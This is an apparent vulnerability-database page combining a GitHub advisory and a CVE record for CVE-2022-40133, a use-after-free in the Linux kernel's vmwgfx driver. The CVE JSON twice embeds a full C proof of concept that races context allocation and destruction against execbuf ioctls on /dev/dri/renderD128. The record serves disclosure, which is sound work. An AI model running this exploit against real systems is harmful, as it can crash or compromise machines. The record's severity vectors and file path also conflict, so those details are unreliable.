Action not permitted
Modal body text goes here.
ghsa-6hh5-gcjx-c6q4
Vulnerability from github
Published
2022-09-10 00:00
Modified
2022-09-15 00:00
Severity
Details
A use-after-free(UAF) vulnerability was found in function 'vmw_execbuf_tie_context' in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel's vmwgfx driver with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
{ "affected": [], "aliases": [ "CVE-2022-40133" ], "database_specific": { "cwe_ids": [ "CWE-416" ], "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2022-09-09T15:15:00Z", "severity": "MODERATE" }, "details": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).", "id": "GHSA-6hh5-gcjx-c6q4", "modified": "2022-09-15T00:00:18Z", "published": "2022-09-10T00:00:29Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40133" }, { "type": "WEB", "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "type": "CVSS_V3" } ] }
cve-2022-40133
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-17 03:49
Severity
Summary
There is an UAF vulnerability in vmwgfx driver
References
URL | Tags |
---|---|
https://bugzilla.openanolis.cn/show_bug.cgi?id=2075 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T12:14:39.687Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "Linux", "versions": [ { "lessThan": "5.13.0-52*", "status": "affected", "version": "v4.20-rc1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "datePublic": "2022-09-06T00:00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ], "exploits": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid,int cid){ \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=cid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nsid=create_surface();\n\n\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n\n\n}" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-09T14:39:51", "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "shortName": "Anolis" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" } ], "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" ], "discovery": "INTERNAL" }, "title": "There is an UAF vulnerability in vmwgfx driver", "x_generator": { "engine": "Vulnogram 0.0.9" }, "x_legacyV4Record": { "CVE_data_meta": { "AKA": "Anolis", "ASSIGNER": "security@openanolis.org", "DATE_PUBLIC": "2022-09-06T07:00:00.000Z", "ID": "CVE-2022-40133", "STATE": "PUBLIC", "TITLE": "There is an UAF vulnerability in vmwgfx driver" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "kernel", "version": { "version_data": [ { "version_affected": "\u003e=", "version_name": "5.13.0-52", "version_value": "v4.20-rc1" } ] } } ] }, "vendor_name": "Linux" } ] } }, "credit": [ { "lang": "eng", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ] }, "exploit": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int sid,int cid){ \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2; \n\targ.context_handle=cid;\n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[0]; \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nsid=create_surface();\n\n\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n\n\n}" } ], "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-416 Use After Free" } ] } ] }, "references": { "reference_data": [ { "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075", "refsource": "MISC", "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" } ] }, "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075" ], "discovery": "INTERNAL" } } } }, "cveMetadata": { "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "assignerShortName": "Anolis", "cveId": "CVE-2022-40133", "datePublished": "2022-09-09T14:39:51.501308Z", "dateReserved": "2022-09-07T00:00:00", "dateUpdated": "2024-09-17T03:49:24.624Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
Loading...